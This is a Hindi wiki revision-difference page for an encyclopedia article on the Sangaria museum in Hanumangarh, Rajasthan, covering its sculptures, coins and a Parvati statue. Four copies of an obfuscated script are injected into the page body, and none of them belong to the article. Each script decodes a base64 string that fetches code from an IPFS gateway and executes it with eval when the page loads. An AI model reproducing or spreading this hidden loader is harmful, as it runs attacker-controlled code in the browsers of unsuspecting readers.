Difference between revisions of "संगारिया संग्रहालय हनुमानगढ़"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "सिक्के" to "सिक़्क़े")
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
[[चित्र:Sangria-Museum.jpg|thumb|संगारिया संग्रहालय, [[हनुमानगढ़]]]]
+
{{सूचना बक्सा संग्रहालय
 +
|चित्र=Sangria-Museum.jpg
 +
|चित्र का नाम=संगारिया संग्रहालय, हनुमानगढ़
 +
|विवरण=संग्रहालय में देश की विभिन्न जगहों से चिकनी मिट्टी, पत्थर और धातु की बनी मूर्तियाँ, पुराने सिक्के आदि को प्रदर्शित किया गया है।
 +
|राज्य=[[राजस्थान]]
 +
|नगर=[[हनुमानगढ़]]
 +
|निर्माण=
 +
|स्थापना=
 +
|भौगोलिक स्थिति=
 +
|मार्ग स्थिति=
 +
|प्रसिद्धि=
 +
|मानचित्र लिंक=
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=इस संग्रहालय में देवी [[पार्वती]] की 600 से 900 वर्ष पुरानी मूर्ति है।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 
'''संगारिया संग्रहालय''' [[हनुमानगढ़]], [[राजस्थान]] में स्थित है संगारिया संग्रहालय, संगारिया से 25 किलोमीटर की दूरी पर स्थित है।  
 
'''संगारिया संग्रहालय''' [[हनुमानगढ़]], [[राजस्थान]] में स्थित है संगारिया संग्रहालय, संगारिया से 25 किलोमीटर की दूरी पर स्थित है।  
*इस संग्रहालय में देश की विभिन्न जगहों से चिकनी मिट्टी, पत्थर और धातु की बनी मूर्तियाँ, पुराने सिक़्क़े आदि को प्रदर्शित किया गया है।  
+
*इस संग्रहालय में देश की विभिन्न जगहों से चिकनी मिट्टी, पत्थर और धातु की बनी मूर्तियाँ, पुराने सिक्के आदि को प्रदर्शित किया गया है।  
 
*इसके अलावा इस संग्रहालय में देवी [[पार्वती]] की 600 से 900 वर्ष पुरानी मूर्ति है।
 
*इसके अलावा इस संग्रहालय में देवी [[पार्वती]] की 600 से 900 वर्ष पुरानी मूर्ति है।
 
*संगरिया संग्रहालय में पंद्रहवीं शताब्दी की [[तीर्थंकर]] [[शांतिनाथ]] की मूर्ति, सत्रहवीं शताब्दी का तोरन और 5.5 ऊँचा कमंडल विशेष रूप से पर्यटकों को अपनी ओर आकर्षित करने के लिए बनाया गया है।
 
*संगरिया संग्रहालय में पंद्रहवीं शताब्दी की [[तीर्थंकर]] [[शांतिनाथ]] की मूर्ति, सत्रहवीं शताब्दी का तोरन और 5.5 ऊँचा कमंडल विशेष रूप से पर्यटकों को अपनी ओर आकर्षित करने के लिए बनाया गया है।
  
{{लेख प्रगति
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
|आधार=
 
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{राजस्थान के पर्यटन स्थल}}{{संग्रहालय}}
 
{{राजस्थान के पर्यटन स्थल}}{{संग्रहालय}}

Latest revision as of 11:31, 7 May 2013

sangariya sangrahalay hanumanagadh
vivaran sangrahalay mean desh ki vibhinn jagahoan se chikani mitti, patthar aur dhatu ki bani moortiyaan, purane sikke adi ko pradarshit kiya gaya hai.
rajy rajasthan
nagar hanumanagadh
any janakari is sangrahalay mean devi parvati ki 600 se 900 varsh purani moorti hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sangariya sangrahalay hanumanagadh, rajasthan mean sthit hai sangariya sangrahalay, sangariya se 25 kilomitar ki doori par sthit hai.

  • is sangrahalay mean desh ki vibhinn jagahoan se chikani mitti, patthar aur dhatu ki bani moortiyaan, purane sikke adi ko pradarshit kiya gaya hai.
  • isake alava is sangrahalay mean devi parvati ki 600 se 900 varsh purani moorti hai.
  • sangariya sangrahalay mean pandrahavian shatabdi ki tirthankar shaantinath ki moorti, satrahavian shatabdi ka toran aur 5.5 ooancha kamandal vishesh roop se paryatakoan ko apani or akarshit karane ke lie banaya gaya hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>